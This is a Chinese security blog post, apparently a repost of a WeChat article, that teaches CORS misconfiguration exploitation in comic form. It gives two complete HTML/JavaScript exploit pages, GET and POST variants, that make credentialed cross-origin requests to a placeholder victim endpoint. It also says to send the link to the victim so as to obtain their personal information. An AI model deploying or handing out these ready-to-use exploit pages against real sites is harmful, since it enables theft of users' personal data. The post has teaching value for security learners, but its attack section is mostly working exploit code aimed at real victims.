视觉盛宴-CORS漫画版

admin
admin
admin
102872
文章
87
评论
2023年8月5日10:54:02评论13 views字数 1326阅读4分25秒阅读模式
免责声明
由于传播、利用本公众号红云谈安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号红云谈安全及作者不为承担任何责任,一旦造成后果请自行承担!本文为连载文章欢迎大家关注红云谈安全公众号!为了给大家带来更好的体验,今天尝试使用漫画结合方式来讲希望对初学者有所帮助,先写了一篇最基础的CORS,欢迎大家转发评论提意见!


视觉盛宴-CORS漫画版
视觉盛宴-CORS漫画版

在个人信息处、订单管理等存在敏感信息处抓包看响应包中抓到敏感数据,且为json响应。使用origin进行验证,Access-Control-Allow-Origin随着Origin源改变而改变,请求数据包中没有签名等验证,存在cors。

视觉盛宴-CORS漫画版搭建网站放入以下脚本:GET型CORS

<!DOCTYPE html>

<html>

<head>

 <title>cors liyon</title>

</head>

<body>

<script type="text/javascript">
 var http = new XMLHttpRequest();
 var url = 'https://www.xxx.com/address/front/detail';#就替换下URL地址为漏洞地址即可
 var params = '';
 http.open('get', url, true);
 http.withCredentials = true;
 http.onreadystatechange = function() {

  if(http.readyState == 4 && http.status == 200) {

   alert(http.responseText);

  }

 }

 http.send();

</script>

</body>

</html>

POST型CORS

<!DOCTYPE html>

<html>

<head>

 <title>cors liyon</title>

</head>

<body>

<script type="text/javascript">
 var http = new XMLHttpRequest();
 var url = 'https://www.xxx.com/api/address';#就替换下URL地址为漏洞地址即可
 var params = 'timeio=true';#替换下post中的参数
 http.open('POST', url, true);
 http.withCredentials = true;
 http.setRequestHeader("Content-type","application/json;charset=UTF-8");
 http.onreadystatechange = function() {

  if(http.readyState == 4 && http.status == 200) {

   alert(http.responseText);

  }

 }

 http.send(params);


</script>

</body>

</html>

将链接发送给对方

视觉盛宴-CORS漫画版

视觉盛宴-CORS漫画版

视觉盛宴-CORS漫画版

视觉盛宴-CORS漫画版


获取到个人信息

视觉盛宴-CORS漫画版

视觉盛宴-CORS漫画版

视觉盛宴-CORS漫画版


原文始发于微信公众号(红云谈安全):视觉盛宴-CORS漫画版

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年8月5日10:54:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   视觉盛宴-CORS漫画版http://cn-sec.com/archives/1935372.html

发表评论

匿名网友 填写信息